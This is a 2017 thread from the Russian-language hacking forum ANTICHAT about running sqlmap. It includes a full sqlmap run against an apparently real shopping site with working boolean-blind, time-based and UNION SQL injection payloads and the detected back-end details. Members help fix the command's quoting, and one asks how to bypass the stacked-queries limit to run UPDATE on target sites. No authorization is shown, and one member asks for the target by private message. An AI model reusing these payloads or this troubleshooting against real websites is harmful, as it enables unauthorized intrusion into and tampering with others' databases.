ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.04.2017, 01:14
|
|
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от brown
↑
(select convert(int,CHAR(65))) - это какой темпер?
по синтаксису это еррор-басед в mssql, но на деле скорее всего фолс от акунетикса
|
|
|
26.04.2017, 02:32
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
Провел на форуме:
59158
Репутация:
2
|
|
Что я делаю не так ???
Код:
D:\>python\python.exe D:\py\sqlmap\sqlmap.py -u http://site.ru/jewell
ery.php?subcategory=8&parent_ID=8&sub=&open=339 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.4.48#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 02:20:02
[02:20:02] [INFO] resuming back-end DBMS 'mysql'
[02:20:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: subcategory (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subcategory=8 AND 7118=7118
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: subcategory=8 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: subcategory=8 UNION ALL SELECT CONCAT(0x7162627171,0x7665706c754e46
41694f424f67757945514458435369775648614c62644a56574b536753446d634f,0x7178716271)
,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dnsi
---
[02:20:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.12
[02:20:08] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\
output\site.ru'
[*] shutting down at 02:20:08
И почему у меня после выполнения команды вылазиет такое сообщение ?
Код:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
D:\>
|
|
|
|
26.04.2017, 11:28
|
|
Новичок
Регистрация: 31.03.2017
Сообщений: 10
Провел на форуме:
3552
Репутация:
0
|
|
Код:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
D:\>
Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке? |
|
|
|
26.04.2017, 11:43
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
Провел на форуме:
59158
Репутация:
2
|
|
Сообщение от l0mt1k
↑
Код:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
D:\>
Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке?
|
|
|
|
26.04.2017, 12:48
|
|
Новичок
Регистрация: 31.03.2017
Сообщений: 10
Провел на форуме:
3552
Репутация:
0
|
|
Именно sqlmap не может выдавать такие ошибки, это ошибки ос..
Скиньте таргет в лс, мне даже интересно.
|
|
|
|
26.04.2017, 17:32
|
|
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от Groove
↑
И почему у меня после выполнения команды вылазиет такое сообщение ?
в двойные кавычки урл засуньте, и ошибок никаких не будет
|
|
|
|
26.04.2017, 18:57
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
Провел на форуме:
59158
Репутация:
2
|
|
Разобрался , всем спасибо!
|
|
|
|
07.05.2017, 21:22
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Что означает эта ошибка при выполнении команды "update" через --sql-shell:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
? и можно ли найти пути обхода ?
|
|
|
|
07.05.2017, 22:15
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Это говорит о том, что инъекция в SELECT запросе, где не возможно выполнить UPDATE.
Условия при которых возможно использование Stacked Queries
 |
|
|
|
07.05.2017, 22:32
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
